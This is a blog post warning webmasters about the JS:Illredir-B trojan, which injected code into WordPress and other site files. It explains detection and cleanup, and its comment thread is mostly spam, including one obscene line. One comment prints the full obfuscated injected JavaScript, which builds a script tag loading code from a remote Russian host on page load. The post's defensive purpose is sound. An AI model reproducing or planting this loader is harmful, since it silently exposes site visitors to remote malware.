It’s 3.30am and way past my bedtime, but I feel this is extremely important and I must highlight this to everyone.
A few days ago, one of my website clients complained that the blog I setup for them on their server using WordPress could not be accessed. When I checked, it appeared to have a PHP header problem and I had no idea why it should occur, but I merely upgraded the WordPress installation and it seemed to solve the problem. Because he had that problem, I thought I had better check on all my other WordPress blogs on our own hosted servers; and they all had the same problem.
I thought that WordPress was probably having a Christmas party and caused all WordPress blogs to fail. I didn’t have time to check if all other WordPress users had the same problem, but since it was solved easily enough by upgrading the installation.
Later though the same client told me that one of their staff who was updating some things on their website (the non-Wordpress main section) discovered a Trojan called JS:Illredir-B [Trj] when she accessed their website. A brief Google search using that name unearthed nothing. I found sites quoting similar issues though.
http://www.prelovac.com/vladimir/warning-website-virus-attack
http://forum.avast.com/index.php?topic=52476.0
About the Trojan
What’s so dangerous about Trojans? Basically, Trojans are harmful software which, while it seems to be doing what you asked it to do, is busy doing other things that you didn’t ask it to do… like, sending information (credit card information, personal information, financial information, etc) secretly to other people. Or they could rewrite certain codes or links in your browsers so that you are redirected to other websites without your knowledge. For example, you may be trying to visit your bank’s website, and you do key in the website URL manually, but you are rerouted to a phishing website which looks identical because of the code rewrite in your browser.
I’m not sure about what this Trojan really does – I’m not a virus expert. If anyone knows, or when I do find out, I’ll update.
Protect Yourself
I haven’t researched enough or spoken to enough people to find out which of their antiviruses work. It’s in the middle of the night so very few people are awake. All I can say here is, I’m using AVG and this antivirus did not detect the trojan. My client himself who uses Avira also said it was not detected. I’m not here to promote any particular antivirus actually, but my client’s staff (the one who detected it) used Avast Antivirus, so perhaps this may be a good one to use.
How Do We Tell Which Websites Are Under Attack?
Well, in my case, all the websites I was taking care of appeared to be have been attacked. I’ve managed to fix them, but I’ll have to keep an eye on them to make sure that they aren’t attacked again.
I’d like to appeal to everyone out there to be aware of this and to help where you can. My guess is that it is possible that there are many websites out there that have been attacked, but the owners or webmasters are unaware of it. This is because the webpage does not look any different from what it usually does, and this is why it’s so dangerous! Please note that the website owners themselves may not be the perpetrators, and are victims. If you have found any website that has been subjected to the trojan attack, please help out by informing the website owner and/or webmaster right away so that action can be taken.
Here is how you can find out whether the website has been attacked:
- Website seems to be loading slower than usual.
- When the website is loading, check the status bar. If the status bar indicates that there is some traffic being routed to websites of unusual names that are not related to the current website in any way, it is very possible that the website has been attacked.
- The easiest way to find out is to take a look at the page source. Go all the way to the bottom. After </html>, if there is something similar to the following, it indicates that the website has been under attack. This code which appears to be gibberish may also appear anywhere INSIDE the website instead of after </html>.
How to view the page source:
- Internet Explorer: View menu > Source
- Firefox: View menu > Page Source
- Google Chrome: Right-click anywhere on the page > View page source
- Opera: View menu > Page Source
- Safari: Right-click anywhere on the page > View Source OR View menu > View source
Fixing The Websites
For those of you who own websites and would like to know how to remove the trojan, it’s easy – just remove the extra code. Not all files are affected, I’ve found that mostly the following files are affected:
- Files named index or have the word index in them. E.g. index.html, index.php, index.htm, index_main.htm
- Files named home or have the word home in them. E.g. home.html, homepage.htm
- Files named main or have the word main in them. E.g. main.html, main_page.htm
- Files named header or have the word header in them. E.g. header.php, header.inc, header_main.php
- Files named footer or have the word footer in them. E.g. footer.php, footer.inc, footer_main.php
- All javascript files with the .js extension. E.g. javascript.js, functions.js
All folders in your server will be affected, including the root folder, the subfolders, the subdomains, and the subfolders in the subdomains.
While some forums suggest that only Linux servers are affected, I’ve found some of my clients who use Windows servers are also affected.
I think that there are some scripts available for you to download and use on your server so that it will automatically scan and remove the code from all affected files, but I didn’t look for them because some of the other users warned that the files themselves have the virus in them. It’s tedious to remove the codes one by one, of course. What I did was to check the last modified date of the files – in my case, the files were affected on 24th and 25th December 2009. That way, I easily detected which files were modified, and I either removed the code manually or I reuploaded my local copy onto the server. It’s tedious, but I know it works.
If anyone has found anything to add to the above, please let me know by email or by commenting. This is pretty dangerous and it’s so malicious… so please be vigilant and do your bit to help out and spread the word.
One more thing I’d like to add: Don’t expect your webhosting provider to inform you or to work on the problem for you. The moment I discovered this, I wrote to all the webhosting providers that my different websites reside on to ask them to check how this could have happened, and to also ask them to inform their clients, and their responses were about the same. They asked me to choose a password that was difficult to guess, and one said I was the only account affected – and this by a company whom I bought several packages from, ALL of which had been attacked.
133 comments
22 pings
depannage informatique says:
April 7, 2010 at 9:29 pm (UTC 8)
is there something we can use to fix it?
Mike says:
April 9, 2010 at 1:17 pm (UTC 8)
version 1.01 is out
Mike says:
April 9, 2010 at 1:25 pm (UTC 8)
If you want cure send me the samples in a zip/rar archive
fanta78 says:
April 13, 2010 at 2:17 am (UTC 8)
Hi Zyen and everyone,
I got almost the same issue on one of my WordPress blog last week-end. A local anti-malware software (Trend Micro) found out this : Virus JS:Illredir-AQ [Trj] (Engine B).
Some major php files where infected, as well as most of the .js standard wordpress files, plus some plugins js files too.
I get rid of this infection by reloading the original Worpdress files over it, plus the infected plugins original files. The database was unaffected.
The malware was sending some requests to floridaorigin.at and was composed by a long javascript line added at the end of the infected files.
It looked like this :
var i=”;var I=”";var N_=new Date();var FH;if(FH!=’uj’ && FH!=’Wf’){FH=”};….
I read in the comment that this malware could have used the ftp client on a pc to infect the wordpress install. Is this behavior confirmed ?
Thanks !
fanta78 says:
April 13, 2010 at 2:24 am (UTC 8)
I forgot to mention that the malware has added a new file in the /wp-admin/js folder, named users.js
I did not spot it in the first place because its name was similar to a standard Wp file. But a comparison with a blank WP installation shows this extra file.
Miguel says:
May 14, 2010 at 1:28 am (UTC 8)
Now there is another “flavour” of this f*cking trojan. AVAST detects it as “JS:Illredir-BL”.
In my case (a few DRUPAL websites) the sites were not loading (a PHP error was spitted out) and therefore I noticed the presence of these weird JS lines at the end of my files.
It seems to use FTP client stored passwords (filezilla’s in my case) to connect to every site and modify files.
It is been a pain in the ass to fix all the mess this shit has done.
The malware code is something like:
YS=["r","Ro"];this.c=11526;this.c-=10;l={d:”K”};var T={};var y=document;var b=”b”;var Yi=”Yi”;var R=new String(“body6mNV”.substr(0,4));var ln=new Array();var _e=”;var z=null;var cU=["vA"];var s=”sc”+”ri”+”pt”;var q=window;this.P=43688;this.P++;var qG;var CB=”";function i(){mT={M:”rx”};this.If=”;var X=String(“]”);var H=”;var Xb={A:13552};var hm={Dp:61130};var B=RegExp;var Sa=["S_","Mo"];this.zO=49795;this.zO+=11;var Z=”\x2f\x62\x72\x61\x6d\x6a\x6e\x65\x74\x2d\x63\x6f\x6d\x2f\x67\x6f\x6f\x67\x6c\x65\x2e\x63\x6f\x6d\x2f\x6c\x65\x6f\x2e\x6f\x72\x67\x2e\x70\x68\x70″;this.g=25187;this.g+=62;var Jv=”Jv”;var X=String(“]”);Ur=29560;Ur–;var Nu=new Array();Ql=60522;Ql–;this.WX=false;function _(L,h){var Yx=new Array();var o=”[";Vn=6775;Vn++;o+=h;o+=X;lR=["e","vH"];var V=new B(o, new String(“gKaW6″.substr(0,1)));try {var V_=’WH’} catch(V_){};return L[new String("rep"+"lacgj8".substr(0,3)+"e")](V, H);Mm=41961;Mm–;};try {var xu=’vu’} catch(xu){};try {var tm=’IH’} catch(tm){};var CN=”CN”;var w=940941-932861;var XG=String(“http:”+”//nos”+”ypipe”+”.ru:”);this.qS=”;var Bv=8354;z=String(“onl”+”oad”);cz=["Ni","fv","RD"];var VU=”;var TG=["uh"];Fq={};var v=_(‘cGrQeUaOtBewEOlOeImPeSnwtw’,'PsSIOGDyQiUoFqTBwZX’);var _n=_(‘aQp6pKe0nud0C8hui1l3du’,’38uqo0JwM1KQ6V’);qG=function(){var cn=new String();try {try {} catch(ZZ){};F=y[v](s);DC={EY:18252};Ru={eo:49335};VU=XG;try {var UX=’PS’} catch(UX){};ma={lC:11445};VU+=w;this.je=false;VU+=Z;IHU=[];try {var os=’sN’} catch(os){};var D=”src2md”.substr(0,3);cUe={xf:”GK”};var m=_(‘d1e1fpeArZ’,’1Xi_pZA’);this.p=46351;this.p+=155;F[D]=VU;var Bm={Vi:”WS”};F[m]=[1][0];kY={oI:false};var PI=new Array();this.VN=”VN”;gL=["hu","wM","za"];y[R][_n](F);var ek=new String();} catch(f){var iC={xI:2475};var BZ=new Array();this.qz=24565;this.qz-=141;};try {} catch(yW){};var Xw={kn:62411};};JA=62427;JA++;jI=13986;jI++;};var Sw=”;var kA=["KP","xb","gF"];i();this.Ss=44880;this.Ss++;var Ek=”";var Sv=["yb","FS"];q[z]=qG;WY=32921;WY-=67;
Hope this helps someone.
Yohanes Supriyato says:
May 17, 2010 at 12:57 pm (UTC 8)
nice…thank for information.
Marco says:
June 2, 2010 at 7:26 pm (UTC 8)
i have a server where some sites were infected, how can i secure the server so this doesnt happen again?
Junk silver says:
June 3, 2010 at 4:18 pm (UTC 8)
Fine information, many thanks to the author. It is puzzling to me now, but in general, the usefulness and importance is overwhelming. Very much thanks again and best of luck!
Tess says:
June 13, 2010 at 7:13 am (UTC 8)
Hi,
Thank you all for the valuable information. I am not a techy person and I need help. My WP blog was just infected by a Trojan virus JS:Illredir-CB[Trj]. When I open my website, Avast gives a notice that looks like this:
Object: my website folder\javascript\date.js
Infection: JS:Illredir-CB[Trj]
Action: Connection aborted
Process: c:\Program Files\IE\iexplore.exe
Can anybody help me how to remove this virus? I have informed my hosting about this but they said the infection must be in my local hard drive. Thanks in advance.
Ami Mortinez says:
July 9, 2010 at 6:06 pm (UTC 8)
Which is what several persons would want to do– producing a big amount of money. it can be incredibly great that you’ve post this a single. at least there would be points that could aid folks on their way in seeking this for the answer of their desires. well anyway, your blog is fantastic. preserve it up.
muwko says:
July 21, 2010 at 9:26 pm (UTC 8)
it was very interesting to read.
I want to quote your post in my blog. It can?
And you et an account on Twitter?
Minnie Eichholz says:
September 5, 2010 at 7:02 pm (UTC 8)
I posted concerning earlier.
Website says:
September 18, 2010 at 8:56 am (UTC 8)
In IE9, Microsoft has integrated its SmartScreen Filter with the new Download Manager feature to bolster security.
Карго китай says:
September 23, 2010 at 2:46 am (UTC 8)
With this blog article you have help me to discover the facts which I have to get far more data. Thanks for that!
jayson says:
December 15, 2010 at 3:21 pm (UTC 8)
Hi mike..please help me..I dont know how i can fix this problem, whenever i access my wp blog – http://blog.gohunt.ph/wp-admin it redirects to this URL – http://blog.gohunt.ph/wp-login.php?redirect_to=http://blog.gohunt.ph/wp-admin/&reauth=1
My client use BLUEHOST and i dont know if our programmer know this issues in accordance to their hosting provider
valium says:
January 25, 2011 at 11:54 pm (UTC 8)
The following time I learn a weblog, I hope that it doesnt disappoint me as a lot as this one. I imply, I do know it was my option to learn, but I actually thought youd have one thing interesting to say. All I hear is a bunch of whining about something that you may repair for those who werent too busy searching for attention.
new articles says:
February 28, 2011 at 1:35 am (UTC 8)
My accomplice and I really loved studying this weblog publish, I used to be just itching to know do you trade featured posts? I’m at all times trying to find somebody to make trades with and merely thought I might ask.
Free Skins says:
April 4, 2011 at 12:32 pm (UTC 8)
Hello this is a fantastic post , and I can tell you that I will definetely abide by your website from now on.Visit me at Free Minecraft1.4
Ned Autullo says:
April 5, 2011 at 12:08 am (UTC 8)
This is a great idea. Thanks for sharing those knowledge. I will definitely check it out.
Nike Dunks says:
April 8, 2011 at 12:09 pm (UTC 8)
Good blog I tend agree with nearly oall of what you wrote. I would love to see new posts on ths. uwill bookmark and come back.
Marcy Knori says:
April 8, 2011 at 7:54 pm (UTC 8)
I just want to tell you that I’m all new to blogs and definitely loved your blog site. Very likely I’m going to bookmark your blog . You absolutely come with very good posts. Thanks for revealing your web page.
Download HD Trailer says:
May 18, 2011 at 10:46 pm (UTC 8)
Thanks for this! I’ll check this site everyday and looking for some posts like this.
gourmet foods online says:
June 12, 2011 at 11:40 pm (UTC 8)
This can be a good weblog. Maintain up all the work. I too enjoy to blog. This is great everyone sharing opinions
USMLE step 2 says:
July 3, 2011 at 6:54 pm (UTC 8)
When i definitely trust everything. Required a little bit to read simple things nonetheless it has been well worth the while. I have to be planning to read some other content on this website to see in the event there is anything how excellent like that
Medical Books says:
July 8, 2011 at 2:48 pm (UTC 8)
She Needs Pussy
Watch Boondocks says:
August 15, 2011 at 1:51 pm (UTC 8)
Awesome post indeed. Friend on mine has been awaiting for this update.
Lilly Wachowski says:
August 24, 2011 at 1:22 pm (UTC 8)
you’re really a excellent webmaster. The website loading speed is incredible. It seems that you’re doing any distinctive trick. Moreover, The contents are masterpiece. you have done a magnificent task in this topic!
Fred says:
September 26, 2011 at 2:06 am (UTC 8)
Merci pour ce post.
soft skills training says:
November 11, 2011 at 8:13 am (UTC 8)
I enjoy reading a post that will make people think. Also, thanks for allowing me to comment!
forex says:
January 5, 2012 at 3:09 pm (UTC 8)
you are really a good webmaster. The web site loading velocity is amazing. It sort of feels that you are doing any unique trick. Furthermore, The contents are masterpiece. you have done a magnificent task in this matter!
Fotografia ?lubna Rzeszów says:
January 5, 2012 at 3:15 pm (UTC 8)
Valuable information. Lucky me I found your web site by accident, and I am stunned why this twist of fate didn’t took place earlier! I bookmarked it.
Up2date says:
January 5, 2012 at 3:22 pm (UTC 8)
What I wouldnt give to have a debate with you about this.  You just say so many things that come from nowhere that Im pretty sure Id have a fair shot.  Your blog is great visually, I mean people wont be bored.  But others who can see past the videos and the layout wont be so impressed with your generic understanding of this topic.
Trojan Attack: JS:Illredir [Trj] | MFSec says:
January 30, 2010 at 7:19 am (UTC 8)
[...] Link al post en ZyenWeb Tool: Remover JS:Illredir-B/C/D/E [...]
Cah Sleman Blog's » Blog Archive » >Trojan Attack: JS: Illredir-B [Trj] says:
March 17, 2010 at 6:52 pm (UTC 8)
[...] Sumber : http://www.zyenweb.com/ [...]
Wordpress: au secours, on attaque mon blog ! | Fantablog says:
April 13, 2010 at 4:32 pm (UTC 8)
[...] Le blog de Zyen qui à eu exactement la même désagréable expérience, beaucoup de commentaires d’autres victimes et des conseils: http://www.zyenweb.com/2009/12/30/trojan-attack-jsillredir-b-trj/ [...]
Site Vital is a resource for PHP clone scripts, where all products cost only 19.95$ says:
October 27, 2011 at 5:32 pm (UTC 8)
Site Vital is a resource for PHP clone scripts, where all products cost only 19.95$…
[...]ZYENWEB » Blog Archive » Trojan Attack: JS:Illredir-B [Trj][...]…
Virus Support says:
October 31, 2011 at 2:39 am (UTC 8)
Virus Support…
[...]ZYENWEB » Blog Archive » Trojan Attack: JS:Illredir-B [Trj][...]…
Jasa Adsense says:
October 31, 2011 at 6:34 am (UTC 8)
Jasa Adsense…
[...]ZYENWEB » Blog Archive » Trojan Attack: JS:Illredir-B [Trj][...]…
dépannage informatique says:
November 3, 2011 at 5:20 pm (UTC 8)
dépannage informatique…
[...]ZYENWEB » Blog Archive » Trojan Attack: JS:Illredir-B [Trj][...]…
domains says:
November 5, 2011 at 9:22 pm (UTC 8)
domains…
[...]ZYENWEB » Blog Archive » Trojan Attack: JS:Illredir-B [Trj][...]…
Wheel Alignment Coupon says:
December 6, 2011 at 7:40 pm (UTC 8)
Free Backlink!…
We loved your website so much we added it to http://www.usbhubreview.net/sites-we-like-2. Just fill in the offer and your backlink is permanent….
Free tattoo removal specialist in Boston MA says:
December 23, 2011 at 5:04 am (UTC 8)
Free tattoo removal specialist in Boston MA…
[...]ZYENWEB » Blog Archive » Trojan Attack: JS:Illredir-B [Trj][...]…
Free tattoo removal specialist washington d.c. says:
December 23, 2011 at 5:26 am (UTC 8)
Free tattoo removal specialist washington d.c….
[...]ZYENWEB » Blog Archive » Trojan Attack: JS:Illredir-B [Trj][...]…
Remove Browser Hijacker says:
December 27, 2011 at 4:05 pm (UTC 8)
Remove Browser Hijacker…
[...]ZYENWEB » Blog Archive » Trojan Attack: JS:Illredir-B [Trj][...]…
syllubus says:
January 2, 2012 at 2:41 pm (UTC 8)
syllubus…
[...]ZYENWEB » Blog Archive » Trojan Attack: JS:Illredir-B [Trj][...]…
giao di?n Vi?t - giao dien website says:
January 2, 2012 at 11:46 pm (UTC 8)
giao di?n Vi?t – giao dien website…
[...]ZYENWEB » Blog Archive » Trojan Attack: JS:Illredir-B [Trj][...]…
IT Support for small Businesses in Berkshire says:
January 6, 2012 at 6:28 pm (UTC 8)
IT Support for small Businesses in Berkshire…
[...]ZYENWEB » Blog Archive » Trojan Attack: JS:Illredir-B [Trj][...]…
Web Hosting says:
January 7, 2012 at 2:19 pm (UTC 8)
Web Hosting…
[...]ZYENWEB » Blog Archive » Trojan Attack: JS:Illredir-B [Trj][...]…
UK Price Comparison says:
January 9, 2012 at 7:52 am (UTC 8)
UK Price Comparison…
[...]ZYENWEB » Blog Archive » Trojan Attack: JS:Illredir-B [Trj][...]…
soft for windows says:
January 12, 2012 at 1:07 am (UTC 8)
soft for windows…
[...]ZYENWEB » Blog Archive » Trojan Attack: JS:Illredir-B [Trj][...]…
joomla says:
January 12, 2012 at 1:51 am (UTC 8)
joomla…
[...]ZYENWEB » Blog Archive » Trojan Attack: JS:Illredir-B [Trj][...]…
antivirus protection says:
January 12, 2012 at 4:21 pm (UTC 8)
antivirus protection…
[...]ZYENWEB » Blog Archive » Trojan Attack: JS:Illredir-B [Trj][...]…
how to root droid x2 says:
January 18, 2012 at 5:56 pm (UTC 8)
how to root droid x2…
[...]ZYENWEB » Blog Archive » Trojan Attack: JS:Illredir-B [Trj][...]…
ESET smart security 5 says:
January 24, 2012 at 3:45 am (UTC 8)
ESET smart security 5…
[...]ZYENWEB » Blog Archive » Trojan Attack: JS:Illredir-B [Trj][...]…